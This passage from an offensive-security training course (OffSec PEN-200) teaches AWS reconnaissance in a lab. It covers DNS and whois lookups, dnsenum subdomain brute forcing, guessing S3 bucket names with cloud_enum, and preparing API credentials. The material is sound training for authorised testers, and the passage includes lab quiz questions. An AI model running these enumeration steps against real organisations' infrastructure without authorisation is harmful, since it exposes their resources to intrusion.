PEN-200: Penetration Testing with Kali Linux
24. Enumerating AWS Cloud Infrastructure
In this Learning Module, we will cover the following Learning Units:
- Reconnaissance of Cloud Resources on the Internet
- Reconnaissance via Cloud Service Provider's API
- Initial IAM Reconnaissance
- IAM Resources Enumeration
As part of the PEN-200 course, this module will focus on the critical techniques for conducting reconnaissance and enumeration specifically within Amazon Web Services (AWS), one of the most widely used cloud platforms.
Reconnaissance, also known as information gathering, is typically the first stage in a penetration testing methodology or a cyber-attack kill chain. This phase is important because it helps us discover as much information as possible about the target, expanding its known attack surface.
During the reconnaissance phase, we can describe enumeration as the process of identifying, categorizing, and listing components and resources within the target.
As we progress through the labs, we'll notice that this process has a recursive nature. While conducting the reconnaissance and enumeration phase, we might identify a vulnerability granting us further access to the environment. Once this happens, it becomes necessary to conduct the reconnaissance phase all over again for the newly-found assets with our greater understanding and permissions.
In this Module, we'll focus on reconnaissance and enumeration of targets hosted on public cloud service providers (CSPs). For our hands-on experience, we'll use Amazon Web Services (AWS) as our lab environment.
First, we'll take an external approach, meaning we'll analyze only what is publicly accessible. We'll learn how to identify whether a target has resources hosted on a cloud platform and move on to exploring techniques for enumerating cloud resources from the outside perspective.
Next, we'll shift to an internal perspective, acting as if we've already gained access to the target's environment. We'll explore how to list cloud resources from the inside using the Cloud Service Provider's API.
By understanding and simulating these techniques, we'll also gain valuable insights into how to safeguard cloud environments effectively.
24.1. About the Public Cloud Labs
Before we jump in, let's run through a standard disclaimer.
This module uses OffSec's Public Cloud Labs for challenges and walkthroughs. OffSec's Public Cloud Labs are a type of lab environment that will complement the learning experience with hands-on practice. In contrast to our more common VM labs found elsewhere in OffSec Learning Modules (in which learners will connect to the lab through a VPN, or via in-browser VMs), learners using the Public Cloud Labs will interact directly with the cloud environment through the Internet.
OffSec believes strongly in the advantages of learning and practicing in a hands-on environment, and we believe that the OffSec Public Cloud Labs represent an excellent opportunity for both new learners and practitioners who want to stay sharp.
Please note the following:
- The lab environment should not be used for activities not described or requested in the learning materials you encounter. It is not designed to serve as a playground to test additional items that are out of the scope of the Learning Module.
- The lab environment should not be used to take action against any asset external to the lab. This is specifically noteworthy because some Modules may describe or even demonstrate attacks against vulnerable cloud deployments for the purpose of describing how those deployments can be secured.
- Existing rules and requirements against sharing OffSec training materials still apply. Credentials and other details of the lab are not meant to be shared. OffSec monitors activity in the Public Cloud Labs (including resource usage) and monitors for abnormal events that are not related to activities described in the learning modules.
Activities that are flagged as suspicious will result in an investigation. If the investigation determines that a student acted outside of the guidelines described above, or otherwise intentionally abused the OffSec Public Cloud Labs, OffSec may choose to rescind that learner's access to the OffSec Public Cloud Labs and/or terminate the learner's account.
Progress between sessions is not saved: a Public Cloud Lab that is restarted will return to its original state. After an hour has elapsed, the Public Cloud Lab will prompt to determine if the session is still active. If there is no response, the lab session will end. Learners can manually extend a session for up to ten hours.

The learning material is designed to accommodate the limitations of the environment. No learner is expected or required to complete all of the activities in a Module within a single lab session, and learners may choose to break up their learning into multiple sessions with the labs. We recommend making a note of the series of commands and actions that were completed previously to facilitate restoring the lab environment to the state it was in when the learner left off. This is especially important when working through complex labs that require multiple actions.
24.2. Reconnaissance of Cloud Resources on the Internet
This Learning Unit covers the following Learning Objectives:
- Perform Domain and Subdomain Reconnaissance
- Identify Service-specific Domains
The first part of the NIST Definition of Cloud Computing Model states:
Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources...
There is also an essential characteristic of this model that states:
Broad network access: Capabilities are available over the network and accessed through standard mechanisms that promote use by heterogeneous thin or thick client platforms (e.g., mobile phones, tablets, laptops, and workstations).
The terms "ubiquitous" and "convenient" in the description, coupled with the "Broad network access" characteristic, introduce an inherent aspect of public accessibility to cloud resources.
The cloud computing model has evolved since that initial definition. We can find cloud resources that are not meant to be publicly accessible by default, or at all, such as network interfaces, virtual disks, and so on. These are internal components of larger, internet-facing resources, but they are nevertheless cloud resources in their own right. Some of these components can even be shared with other users.
In this Module, the attacker's goal during discovery and reconnaissance is to find publicly-accessible resources as well as resources that weren't meant to be publicly-accessible (typically due to misconfigurations).
In this Learning Unit, we'll discuss techniques for discovering cloud resources accessible on the public network that don't require authenticated interaction with the CSP API.
24.2.1. Accessing the Lab
For the hands-on experience in this Module, we'll adopt the role of an attacker during the reconnaissance phase, focusing on a single organization as the target. Starting with nothing but the domain name, our initial steps will be to collect all the information we can.
There are some preparatory steps needed to set up our lab environment; these are found at the end of this section. Deployment will take a few minutes to complete and, once complete, the additional services might take 5-10 minutes to start.
Once the lab finishes its deployment, we'll receive some pieces of information we'll need later while working in the lab.
- Public DNS IP Address
- Domain name of the target
- Credentials for the IAM user attacker
- ACCESS_KEY_ID
- SECRET_ACCESS_KEY
First, we need to configure the DNS in our local environment to use the public DNS set for this lab.
Because this is a simulated exercise, we will not conduct any action on a real published domain. Instead, we'll be targeting a custom public DNS deployed within the lab. The techniques and tools we'll use apply to any public domain, however. After the lab starts, it will take roughly five minutes for the custom DNS server to start responding. We can confirm that all services have started when we can successfully query the DNS server.
Tip
We should also keep in mind that the public IP address of the DNS server will change every time we restart the lab, and we'll need to run this configuration again.
In our Kali machine, we can check our current DNS server by reading the /etc/resolv.conf file.
kali@kali:~$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 1.1.1.1
Listing 1 - Getting DNS Servers in Our Kali Machine
We need to add a new nameserver line at the beginning of the file so that our DNS queries first go to our lab DNS server. We'll use nano to modify the file, as shown below:
kali@kali:~$ sudo nano /etc/resolv.conf
[sudo] password for kali:
kali@kali:~$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 44.205.254.229
nameserver 1.1.1.1
Listing 2 - Modifying /etc/resolv.conf to Add a New Nameserver
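Editing the file by hand works, but since the lab's DNS IP changes on every restart, a small helper can prepend the nameserver line automatically. The sketch below is our own (the function name `add_lab_nameserver` is not part of the course material); it takes the file path as a parameter so the change can be rehearsed on a copy before running it against /etc/resolv.conf with sudo.

```shell
# Sketch: prepend a lab nameserver to a resolv.conf-style file.
# Idempotent: if the entry is already present, nothing is changed.
add_lab_nameserver() {
    local ip="$1" file="$2"
    # Skip if the exact nameserver line already exists
    grep -qx "nameserver $ip" "$file" && return 0
    # Insert the new nameserver line at the top of the file (GNU sed)
    sed -i "1i nameserver $ip" "$file"
}
```

For the real file, we would run it as root, e.g. `sudo bash -c '...; add_lab_nameserver 44.205.254.229 /etc/resolv.conf'`, substituting the DNS IP our lab assigned.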
We can test the configuration with a command-line tool such as host, which performs DNS lookups and is commonly installed by default on Linux.
Let's assume www.offseclab.io exists in our target domain. We'll first run a DNS lookup specifying the DNS server's public IP address. This will validate that the DNS server is responding as expected.
Next, we'll run a DNS lookup again without specifying a DNS server. The tool will use the system's DNS configuration. This will help confirm that our system configuration is also working as expected.
Tip
Some ISPs restrict customers from querying external DNS servers. If this occurs, the two commands in the listing below will fail. While not common, this can happen. As a workaround, using a mobile device as a hotspot to connect our lab to the internet is an option. In the worst-case scenario, this issue would only affect our ability to work on the 'Domain Reconnaissance' section.
kali@kali:~$ host www.offseclab.io 44.205.254.229
www.offseclab.io has address 52.70.117.69
kali@kali:~$ host www.offseclab.io
www.offseclab.io has address 52.70.117.69
Listing 3 - Testing DNS Configurations in Kali Using host Tool
Finally, we should keep in mind that the DNS configuration we set up will not be permanent. The default network configuration in Kali uses NetworkManager, which will overwrite the contents of the resolv.conf file every time we restart the network service or the whole operating system.
When we finish working in our lab, we need to reset our local Kali machine's DNS settings. To do this, we can again edit the /etc/resolv.conf file and remove the nameserver entry that we set while configuring the lab. Another easier way is to restart the NetworkManager service, which will return the file to the original state.
kali@kali:~$ sudo systemctl restart NetworkManager
[sudo] password for kali:
kali@kali:~$ cat /etc/resolv.conf
# Generated by NetworkManager
nameserver 1.1.1.1
Listing 4 - Resetting the DNS Settings
We can ensure everything is working as expected by navigating to any public site in the web browser.
For now, we'll start the lab to retrieve the DNS public IP address and configure the network in our local machine to use that secondary DNS server. We'll set aside the user's credentials for now and use them later in the module.
24.2.2. Domain and Subdomain Reconnaissance
Let's begin analyzing the target from the attacker's perspective. Currently, all we know about our target is its domain name: offseclab.io.
There are several things we can learn by analyzing the domain and the public IP address. In this section, we'll focus mainly on cloud-related information.
Let's begin by getting the authoritative DNS servers, i.e. the name servers that contain all records for this domain. We'll use the host command with the -t ns argument to query the nameserver records of the offseclab.io domain.
kali@kali:~$ host -t ns offseclab.io
offseclab.io name server ns-1536.awsdns-00.co.uk.
offseclab.io name server ns-512.awsdns-00.net.
offseclab.io name server ns-0.awsdns-00.com.
offseclab.io name server ns-1024.awsdns-00.org.
Listing 5 - Querying Nameserver Records of offseclab.io Domain
The names are very descriptive, and we can deduce the domain is managed by AWS. We can validate this by running the whois command to check the DNS registrar information of those domains. We'll pipe the output to the grep command to filter only the line that contains the organization name.
kali@kali:~$ whois awsdns-00.com | grep "Registrant Organization"
Registrant Organization: Amazon Technologies, Inc.
Listing 6 - Getting the Registrar Information of awsdns-00.com Domain
Now, we are sure that the offseclab.io domain is managed by AWS, very likely using the Route53 service. This doesn't mean the rest of the infrastructure is also hosted in AWS, so we need to keep digging.
Let's continue, using the host command again to get the public IP address of the website www.offseclab.io.
Tip
The public IP address in the listing below will be different every time we start the lab.
kali@kali:~$ host www.offseclab.io
www.offseclab.io has address 52.70.117.69
Listing 7 - Getting the Public IP address of www.offseclab.io
In the same way as before, we can learn some things by querying the DNS and doing a reverse DNS lookup. We'll use the host command again, but this time we'll query the public IP address. We'll also use whois to learn more details about the public IP address, paying special attention to the OrgName value.
kali@kali:~$ host 52.70.117.69
69.117.70.52.in-addr.arpa domain name pointer ec2-52-70-117-69.compute-1.amazonaws.com
kali@kali:~$ whois 52.70.117.69 | grep "OrgName"
OrgName: Amazon Technologies Inc.
Listing 8 - Getting Details of the Public IP Address of the Website
With the whois lookup, we learn that the public IP belongs to Amazon, and with the reverse lookup, we learn two things: the resource is hosted in AWS (amazonaws.com), and it is an Amazon Elastic Compute Cloud (Amazon EC2) instance.
Tip
The EC2 instance is a virtual machine in the AWS cloud. EC2 is a common service used to host websites, applications, and other services that require a server.
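The PTR naming convention itself encodes useful data: the dashes in the hostname are the octets of the public IP, and the label that follows identifies the region (compute-1 is the legacy alias for us-east-1). A small sketch, using only Bash string operations (the function name `parse_ec2_ptr` is ours):

```shell
# Sketch: recover the public IP and region label from an EC2 PTR name.
# EC2 PTR records follow ec2-<a>-<b>-<c>-<d>.<region-label>.amazonaws.com;
# compute-1 is the legacy label for us-east-1.
parse_ec2_ptr() {
    local ptr="$1"
    local host="${ptr%%.*}"      # ec2-52-70-117-69
    local ip="${host#ec2-}"      # 52-70-117-69
    ip="${ip//-/.}"              # 52.70.117.69
    local region="${ptr#*.}"     # compute-1.amazonaws.com
    region="${region%%.*}"       # compute-1
    echo "$ip $region"
}
```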
By doing some reconnaissance on the domain, we learned that the resource is hosted in a public CSP. This helps adapt our pentesting methodology and techniques to target the correct cloud environment.
While doing passive reconnaissance around the domain and public IP address, we should also include more OSINT research to collect more information about the target. The data we gather during this stage could be useful during later reconnaissance. Because the target in this lab is not a real organization, we won't find more data at this stage, so we'll skip this.
It's worth noting that this phase should be executed recursively: we should repeat the same steps for any other domains, subdomains, and public IP addresses we find.
Finally, we'll run an automated tool that retrieves some information we already have, but also performs a dictionary attack to discover more subdomains. Many tools can do this; in this lab, we'll use the dnsenum tool that comes with Kali. The only required parameter is the target domain name, i.e. offseclab.io. We'll also add the --threads 100 argument to increase the number of threads issuing DNS requests, speeding up the attack.
kali@kali:~$ dnsenum offseclab.io --threads 100
dnsenum VERSION:1.2.6
----- offseclab.io -----
Host's addresses:
__________________
offseclab.io. 60 IN A 52.70.117.69
Name Servers:
______________
ns-1536.awsdns-00.co.uk. 0 IN A 205.251.198.0
ns-0.awsdns-00.com. 0 IN A 205.251.192.0
ns-512.awsdns-00.net. 0 IN A 205.251.194.0
ns-1024.awsdns-00.org. 0 IN A 205.251.196.0
Mail (MX) Servers:
___________________
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for offseclab.io on ns-512.awsdns-00.net ...
AXFR record query failed: corrupt packet
Trying Zone Transfer for offseclab.io on ns-1024.awsdns-00.org ...
AXFR record query failed: corrupt packet
Trying Zone Transfer for offseclab.io on ns-0.awsdns-00.com ...
AXFR record query failed: corrupt packet
Trying Zone Transfer for offseclab.io on ns-1536.awsdns-00.co.uk ...
AXFR record query failed: corrupt packet
Brute forcing with /usr/share/dnsenum/dns.txt:
_______________________________________________
mail.offseclab.io. 60 IN A 52.70.117.69
www.offseclab.io. 60 IN A 52.70.117.69
...
Listing 9 - Using dnsenum to Automate DNS Reconnaissance of offseclab.io Domain
The output confirms the name servers and the public IP address we found earlier. We also discovered some subdomains. These sites are fictional for this lab and don't contain real vulnerabilities, so we don't need to analyze them further.
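The dictionary attack that dnsenum automates can also be sketched as a short shell loop of our own: expand a wordlist into fully-qualified candidate names, then resolve each one. The generator below is pure string handling (the function name `gen_candidates` is ours); the resolution step requires network access, so it is shown separately as a comment.

```shell
# Sketch: expand a wordlist into candidate FQDNs for a target domain,
# mimicking the first half of a DNS dictionary attack.
gen_candidates() {
    local domain="$1"; shift
    # Each remaining argument is one dictionary word
    for word in "$@"; do
        echo "${word}.${domain}"
    done
}

# Resolution step (requires network access to the lab DNS):
#   gen_candidates offseclab.io www mail dev | while read -r fqdn; do
#       host "$fqdn" >/dev/null 2>&1 && echo "FOUND: $fqdn"
#   done
```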
Let's wrap up this section by providing a glimpse of what we have learned about the target through reconnaissance:
- The domain service is hosted in AWS, so it's likely using AWS Route53 service.
- The domain name resolves to a public IP, which is also provided by AWS, specifically to the EC2 service.
- This public IP serves several websites including the main site www.offseclab.io, meaning they are running inside an EC2 instance.
In the next section, we'll analyze the main site while continuing to perform cloud-related reconnaissance.
Labs
- What command is used to query the authoritative DNS servers for the domain offseclab.io?
A) host -t ns offseclab.io
B) whois offseclab.io
C) dig offseclab.io
D) nslookup offseclab.io
- Which AWS service is very likely being used to manage the offseclab.io domain?
A) Amazon S3
B) Amazon EC2
C) Amazon Route 53
D) Amazon RDS
- Find the proof while gathering more info about the domain inside other commonly used DNS records.
24.2.3. Service-specific Domains
We already conducted some reconnaissance around the target's domain name. In this section, we'll search around service-specific domains to find cloud resources belonging to the target organization.
Public CSPs often use a specific domain name to address cloud resources. We already found an example of this in the previous section when we did a DNS reverse lookup to the public IP address and, through the response (ec2-52-70-117-69.compute-1.amazonaws.com), we discovered the domain amazonaws.com and that they are using the EC2 service. That is the custom naming that AWS uses to create the PTR records for their public IPs assigned to EC2 instances.
We can leverage these naming conventions to enumerate cloud resources.
Let's continue with the lab to explore an example. We'll interact with the publicly-available resources we have found, starting with the website.
Tip
Before proceeding with the lab, we should ensure the lab is running and the public IP of the DNS is configured in our local OS.
We'll use a browser to start analyzing the site. Our main focus is to learn about the technologies behind it. After this, we can decide whether to use other tools for further analysis.
Let's open a web browser and navigate to http://www.offseclab.io.
By interacting with the site, we can learn that offseclab.io is an organization hosting vulnerable lab environments for learning purposes.
Warning
We should be aware that the site is fictional for this lab; it doesn't really implement or give access to the projects displayed.
By visiting the domain, we're provided with an HTML file. At this point, we're unsure which, or even if, server-side scripting languages are in use. To inspect this further, let's use the Developer Tools to determine what assets the site loads when we browse it.
We'll use Firefox, since it's included in the default installation of Kali Linux, and open the Developer Tools with the F12 hotkey (or Ctrl + Shift + I). Other browsers implement similar hotkeys for their own developer tools, although the UI may look different.
Inside the Developer Tools window, we'll navigate to the Network tab. This will show us all the requests that are made when loading the website. Once in the Network tab, we can reload the current page.
We receive a table with several elements that the website loads. This includes stylesheet files (.css), script files (.js), images (.png, .jpg), etc. The File column identifies the filename of the element and the Domain column identifies to which domain the browser requests it.
If we scroll through the list, we'll find that the browser requests elements coming from some domains, which include offseclab.io, some fonts from external domains, and more interestingly, some images from s3.amazonaws.com.
We can click on one of these images to retrieve more details of the request, including the full resource path of the element.
We can copy the URL or double-click on the row to open the image in another browser tab, then analyze the URL.
By identifying the domain in the URL s3.amazonaws.com, we can infer that the images are stored in an AWS S3 bucket.
Tip
If we have local issues communicating with the public DNS server, we can get the bucket name from AWS CLI by running the 's3 ls' subcommand with the attacker profile.
From the path offseclab-assets-public-axevtewi/sites/www/images/amethyst.png, we can learn that the S3 bucket name is offseclab-assets-public-axevtewi and the object key is sites/www/images/amethyst.png.
The URL format is documented in Methods for accessing a bucket.
Tip
The documentation includes the AWS Region in the URL. In this example, AWS internally redirects s3.amazonaws.com to s3.us-east-1.amazonaws.com. This behavior might not be the same for other services.
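Splitting an S3 URL into bucket name and object key is simple string handling, and automating it avoids mistakes when many URLs turn up. The sketch below is ours (the function name `parse_s3_url` is an assumption, not an AWS tool) and handles both path-style (s3.amazonaws.com/bucket/key) and virtual-hosted-style (bucket.s3.amazonaws.com/key) URLs:

```shell
# Sketch: split an S3 URL into its bucket name and object key.
parse_s3_url() {
    local url="$1"
    url="${url#http://}"; url="${url#https://}"   # strip scheme
    local host="${url%%/*}" path="${url#*/}"
    if [ "$host" = "s3.amazonaws.com" ]; then
        # Path-style: s3.amazonaws.com/<bucket>/<key>
        echo "bucket=${path%%/*} key=${path#*/}"
    else
        # Virtual-hosted style: <bucket>.s3.amazonaws.com/<key>
        echo "bucket=${host%%.s3.*} key=$path"
    fi
}
```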
Before diving into enumeration, let's quickly check if we can list the content of the bucket. We can test this by browsing the URL of the bucket in the web browser.
We'll remove the object key from the URL like the following: http://domain/bucket_name, then browse to that URL. Ideally, we should receive an Access Denied error.
Instead of the Access Denied error, we received an XML response containing all the key objects in the bucket. This is not a good practice in the bucket configuration. Unfortunately for us, besides the images, there aren't other objects in the bucket that can help us exploit the target further.
Tip
Objects can be public inside a bucket without setting public access to the bucket itself.
Next, let's analyze the bucket name: offseclab-assets-public-axevtewi. We can assume a naming convention is in use that consists of the organization name, followed by a description of the bucket, and a random string. Bucket names must be globally unique, so the random string likely ensures that the name won't be duplicated. It can also help prevent discovery by enumeration.
Making some assumptions about the naming convention, let's try browsing for the buckets with the name offseclab-assets-dev. In the original URL, we'll replace the word "public" with "dev".
The XML response of offseclab-assets-dev clearly states that the bucket does not exist.
Let's try again, this time using the name offseclab-assets-private.
This time we receive a different response: an Access Denied error. This means the bucket exists, but access is denied because it doesn't have public read permission. This is a good configuration for the bucket.
Tip
The random string should have helped avoid discovery by enumeration, but because the same random string was reused for every bucket, its effect was nullified. Adding random strings or hashes is a normal practice, but in this case, it was poorly implemented.
This discovery required some creativity and assumptions, but shows an example of enumerating cloud resources. The process is also easy to automate by writing a script on our own or searching for an already-built tool like cloudbrute or cloud-enum.
Just like the S3 service, other cloud services that are designed to be publicly-accessible typically use a custom URL or standard convention for displaying resources. This is true for other public CSPs, too. The table below lists some examples.
| AWS | Azure | GCP |
|---|---|---|
| s3.amazonaws.com | web.core.windows.net | appspot.com |
| awsapps.com | file.core.windows.net | storage.googleapis.com |
| | blob.core.windows.net | |
| | azurewebsites.net | |
| | cloudapp.net | |

Table 1 - Custom URLs of the Three Major CSPs
We can leverage these domains to search for resources in multiple clouds based on a keyword related to our target. Multi-cloud deployment is out of the scope for this Module, but we'll use the tool cloud-enum to search for more buckets belonging to offseclab.io.
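As a quick sketch of that idea, we can expand a target keyword against the service-specific domains from Table 1 and then check which candidates resolve (the function name `gen_cloud_hosts` is ours, and the resolution step is left to a tool like host since it needs network access):

```shell
# Sketch: expand a keyword into candidate hostnames across the
# service-specific domains listed in Table 1.
gen_cloud_hosts() {
    local keyword="$1"
    local suffixes="s3.amazonaws.com awsapps.com web.core.windows.net \
file.core.windows.net blob.core.windows.net azurewebsites.net appspot.com"
    for s in $suffixes; do
        echo "${keyword}.${s}"
    done
}

# Checking which candidates exist (network required):
#   gen_cloud_hosts offseclab | while read -r h; do
#       host "$h" >/dev/null 2>&1 && echo "FOUND: $h"
#   done
```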
Tip
Even though this is a lab environment, we are interacting directly with the AWS API. We'll keep this environment controlled by running the enumeration with a small-sized dictionary.
Kali already includes cloud-enum in its official repository. Let's install it after updating the packages.
kali@kali:~$ sudo apt update
[sudo] password for kali:
...
kali@kali:~$ sudo apt install cloud-enum
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
...
Unpacking cloud-enum (0.7-3) over (0.7-2) ...
Setting up cloud-enum (0.7-3) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for kali-menu (2023.1.7) ...
Listing 10 - Updating the Packages and Installing cloud-enum in Kali Linux
Warning
Be aware that the package name of the tool is cloud-enum but the actual tool name to run in the command line is cloud_enum.
Once the installation completes, we can confirm it's installed by running cloud_enum --help. This will output the basic command usage.
kali@kali:~$ cloud_enum --help
usage: cloud_enum [-h] (-k KEYWORD | -kf KEYFILE) [-m MUTATIONS] [-b BRUTE]
[-t THREADS] [-ns NAMESERVER] [-l LOGFILE] [-f FORMAT]
[--disable-aws] [--disable-azure] [--disable-gcp] [-qs]
Multi-cloud enumeration utility. All hail OSINT!
options:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: /usr/lib/cloud-
enum/enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default:
/usr/lib/cloud-enum/enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Appends found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv) - default: text
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
Listing 11 - Getting the cloud_enum Tool Usage Options
The cloud_enum tool will search several public CSPs for resources containing a keyword specified with the --keyword KEYWORD (-k KEYWORD) parameter. We can specify multiple keyword arguments, or we can provide a list with the --keyfile KEYFILE (-kf KEYFILE) parameter.
We can also use the --mutations (-m) option to specify a file to add extra words to the keyword. If we don't specify any file, the /usr/lib/cloud-enum/enum_tools/fuzz.txt file is used by default. We can disable this option using the --quickscan (-qs) parameter.
Let's first test this using the bucket name we already know by running a quick scan with cloud_enum -k offseclab-assets-public-axevtewi --quickscan. We'll also restrict the check to AWS by disabling the other CSPs with the --disable-azure and --disable-gcp parameters.
kali@kali:~$ cloud_enum -k offseclab-assets-public-axevtewi --quickscan --disable-azure --disable-gcp
...
Keywords: offseclab-assets-public-axevtewi
Mutations: NONE! (Using quickscan)
Brute-list: /usr/lib/cloud-enum/enum_tools/fuzz.txt
[+] Mutated results: 1 items
++++++++++++++++++++++++++
amazon checks
++++++++++++++++++++++++++
[+] Checking for S3 buckets
OPEN S3 BUCKET: http://offseclab-assets-public-axevtewi.s3.amazonaws.com/
FILES:
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/offseclab-assets-public-axevtewi
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/logo.svg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic02.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic05.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic13.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire.jpg
Elapsed time: 00:00:00
[+] Checking for AWS Apps
[*] Brute-forcing a list of 1 possible DNS names
Elapsed time: 00:00:00
[+] All done, happy hacking!
Listing 12 - Running Quick Scan Against offseclab-assets-public-axevtewi Bucket Using cloud_enum in AWS
We can confirm that the tool works as expected. It found the bucket and also listed the content. Next, we'll try to enumerate with more keywords. Because we are testing a specific naming pattern, we'll benefit from building a custom key file.
There are many ways we could accomplish this. We'll use a Bash one-liner for loop that iterates over some keywords, echoing each one wrapped with a prefix (offseclab-assets) and a suffix (-axevtewi). Finally, we'll use the tee command to output the result to the console as well as to the /tmp/keyfile.txt file. The result is a key file containing the bucket names whose existence we want to validate.
kali@kali:~$ for key in "public" "private" "dev" "prod" "development" "production"; do echo "offseclab-assets-$key-axevtewi"; done | tee /tmp/keyfile.txt
offseclab-assets-public-axevtewi
offseclab-assets-private-axevtewi
offseclab-assets-dev-axevtewi
offseclab-assets-prod-axevtewi
offseclab-assets-development-axevtewi
offseclab-assets-production-axevtewi
Listing 13 - Making a Dictionary of Keywords to Search S3 Buckets
Now, we can run cloud_enum again by specifying the key file we generated (/tmp/keyfile.txt) with the --keyfile (-kf) argument.
kali@kali:~$ cloud_enum -kf /tmp/keyfile.txt -qs --disable-azure --disable-gcp
...
Keywords: offseclab-assets-public-axevtewi, offseclab-assets-private-axevtewi, offseclab-assets-dev-axevtewi, offseclab-assets-prod-axevtewi, offseclab-assets-development-axevtewi, offseclab-assets-production-axevtewi
Mutations: NONE! (Using quickscan)
Brute-list: /usr/lib/cloud-enum/enum_tools/fuzz.txt
[+] Mutated results: 6 items
++++++++++++++++++++++++++
amazon checks
++++++++++++++++++++++++++
[+] Checking for S3 buckets
OPEN S3 BUCKET: http://offseclab-assets-public-axevtewi.s3.amazonaws.com/
FILES:
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/offseclab-assets-public-axevtewi
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/amethyst.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/logo.svg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic02.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic05.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/pic13.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/ruby.jpg
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire-expanded.png
->http://offseclab-assets-public-axevtewi.s3.amazonaws.com/sites/www/images/saphire.jpg
Protected S3 Bucket: http://offseclab-assets-private-axevtewi.s3.amazonaws.com/
Elapsed time: 00:00:06
[+] Checking for AWS Apps
[*] Brute-forcing a list of 6 possible DNS names
Elapsed time: 00:00:00
[+] All done, happy hacking!
Listing 14 - Running cloud_enum Against The Generated keyfile.txt File
From the output, we can confirm there is another bucket, but it's Protected, meaning that it's not publicly-readable.
We could also attempt to validate if there are other buckets using other information we found during the reconnaissance phase. For example, it could be buckets that include the name of the offseclab projects like offseclab-assets-ruby-axevtewi or offseclab-ruby-axevtewi. We'll leave this as an exercise to the learner.
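To jump-start that exercise, we can generate a gemstone-themed key file the same way we built the first one. The gemstone list below is only an example starting point (note that the site spells "saphire" that way in its image filenames), and the suffix is a placeholder for the lab-assigned random value:

```shell
# Sketch: build a gemstone-themed keyfile for cloud_enum.
# The suffix is a placeholder for the lab-assigned random value,
# and the gemstone list is an example starting point.
suffix="axevtewi"
for gem in amethyst ruby saphire emerald topaz; do
  echo "offseclab-${gem}-${suffix}"
done | tee /tmp/keyfile-gems.txt
```

We could then feed /tmp/keyfile-gems.txt to cloud_enum with the -kf argument, exactly as before.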
Let's summarize what we learned in this section.
Some resources in the cloud are meant to be publicly accessible, and discovering them is not, by itself, a security problem. However, we may encounter resources whose misconfigurations grant excessive permissions.
Hosting in the cloud is flexible, meaning that organizations can deploy resources in several clouds. Discovering that an organization is using one cloud provider doesn't mean they aren't using other CSP services.
Labs
- What does the XML response indicate when received after removing the object key from the S3 URL?
A) The bucket does not exist
B) The bucket is publicly accessible and lists its contents
C) The bucket is fully private
D) The bucket is hosted on Azure
- Which custom URL is used by AWS for storing objects in S3 buckets?
A) azurewebsites.net
B) s3.amazonaws.com
C) storage.googleapis.com
D) web.core.windows.net
- Use the concepts we've learned to find other S3 buckets. We may want to build a dictionary around gemstone names, as that is the theme the target uses to name its projects. Assume the format follows the pattern offseclab-[gemstone]-[lab_assigned_random_value]. The proof resides in an object named proof.txt.
24.3. Reconnaissance via Cloud Service Provider's API
This Learning Unit covers the following Learning Objectives:
- Obtain information from publicly shared resources
- Obtain account IDs from public S3 buckets
- Enumerate IAM users in other accounts
Typically, public CSPs will enable at least two ways for customers to interact with their cloud environment.
One way is via a web application that acts as a portal for cloud services provided by the CSP. Access is protected by credentials (username, password, MFA, etc).
Another way is through APIs that allow customers to interact programmatically, integrating with custom solutions and even other cloud platforms. The API is publicly available, but requires authentication to interact with it.
In this section, we'll learn about some techniques that an attacker can use to discover more information about the target by interacting with the provider's API. In this case, the attacker creates an account in the cloud provider to receive credentials for interacting with the API.
We'll also review some examples of API abuse to obtain internal information about the target, i.e. users and roles.
24.3.1. Preparing the Lab - Configure AWS CLI
In the following sections of this Learning Unit, we'll interact with the AWS API from the command line using the AWS CLI, configured with the credentials provided when we start the lab. Although the access keys in this lab belong to a user inside the target account, we'll simulate that they belong to an attacker with an external AWS account.
In AWS, the service that manages users and their permissions within the AWS cloud environment is called Identity and Access Management. We'll refer to this service as IAM and the users as IAM users.
